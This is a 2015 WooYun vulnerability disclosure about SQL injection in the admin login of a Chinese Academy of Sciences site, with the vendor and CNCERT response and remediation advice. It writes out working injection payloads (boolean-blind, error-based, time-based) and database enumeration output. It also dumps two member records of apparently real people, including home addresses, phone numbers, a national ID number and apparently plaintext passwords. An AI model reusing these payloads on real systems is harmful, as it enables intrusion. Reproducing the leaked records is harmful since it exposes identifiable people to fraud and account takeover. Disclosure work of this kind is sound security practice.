当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146883

漏洞标题:中科院某站后台管理系统登录框注入,用户信息泄露

相关厂商:中科院

漏洞作者: 偶然

提交时间:2015-10-15 11:18

修复时间:2015-12-03 18:18

公开时间:2015-12-03 18:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-15: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经确认,细节仅向厂商公开
2015-10-29: 细节向核心白帽子及相关领域专家公开
2015-11-08: 细节向普通白帽子公开
2015-11-18: 细节向实习白帽子公开
2015-12-03: 细节向公众公开

简要描述:

听说厂商不错

详细说明:

POST /admin/logadmin.php HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/admin/login.php
Cookie: PHPSESSID=bjgoj8dp2q76m7n7hnhcq17616
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
username=admin&password=admin&validator=iyebgn&imageField.x=25&imageField.y=16
username参数存在注入

漏洞证明:

Place: POST
Parameter: username
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: username=admin' RLIKE IF(5126=5126,0x61646d696e,0x28) AND 'tyOj'='tyOj&password=admin&validator=iyebgn&imageField.x=25&imageField.y=16
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: username=admin' AND (SELECT 8851 FROM(SELECT COUNT(*),CONCAT(0x3a6f73763a,(SELECT (CASE WHEN (8851=8851) THEN 1 ELSE 0 END)),0x3a69746b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xitt'='xitt&password=admin&validator=iyebgn&imageField.x=25&imageField.y=16
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: username=-3463' OR 8168=SLEEP(5) AND 'Zmqa'='Zmqa&password=admin&validator=iyebgn&imageField.x=25&imageField.y=16
---
web server operating system: Linux Debian
web application technology: PHP 5.4.36, Apache 2.2.22
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] orsc_web
Database: orsc_web
[6 tables]
+---------+
| admin |
| conlist |
| const |
| content |
| member |
| message |
+---------+
web server operating system: Linux Debian
web application technology: PHP 5.4.36, Apache 2.2.22
back-end DBMS: MySQL 5.0
Database: orsc_web
+--------+---------+
| Table | Entries |
+--------+---------+
| member | 1184 |
+--------+---------+
随便跑两个用户看看
Table: member
[2 entries]
| mem_id | mem_ri | mem_yue | mem_shi | mem_pic | mem_time | mem_name | mem_type | mem_nian | mem_zhuye | mem_email | mem_sheng | mem_dizhi | mem_minzu | mem_number | mem_wenhua | mem_jianli | mem_shouji | mem_danwei | mem_status | mem_dangpai | mem_dianhua | mem_xingbie | mem_youbian | mem_nicheng | mem_password | mem_zhicheng | mem_daoqishijian | mem_shenfenzheng | mem_zhichengdengji | mem_renzhiqingkuang |
| 8 | 9 | 1 | 海淀区 | uploadfile/pic/1352815576.jpg | 2012-11-13 10:01:06 | 刘德刚 | 1 | 1956 | http://**.**.**.** | [email protected]**.**.**.** | 北京 | 北京中关村东路55号 | 汉族 | S391000910M | 博士 | | 13611228905 | 中国科学院数学与系统科学研究院 | 7 | 无 | 010-62651330 | 男 | 100190 | dliu | lb851215 | 副教授 | 2099 | 110108195601090035 | 高级 | 2000-今:中国运筹学会常务副秘书长 |
| 14 | 1 | 1 | 哈尔滨 | uploadfile/pic/1359356276.jpg | 2013-01-28 03:44:07 | 屈绍建 | 1 | 1978 | **.**.**.** | [email protected]**.**.**.** | 黑龙江 | 哈尔滨市南岗区一匡街2号2H栋453室 | 汉 | S390020004M | 博士研究生 | <blank> | <blank> | 哈尔滨工业大学教师 | 7 | 共产党员 | 13199568196 | 男 | 150010 | qushaojian | qsj1978316 | 副教授 | 2099 | <blank> | 高级 | <blank> |
后台

1.png


修复方案:

一、后台不要暴露
二、sql注入参数化,过滤关键字

版权声明:转载请注明来源 偶然@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-10-19 18:16

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT向中科院通报,由其后续协调网站管理单位处置。

最新状态:

暂无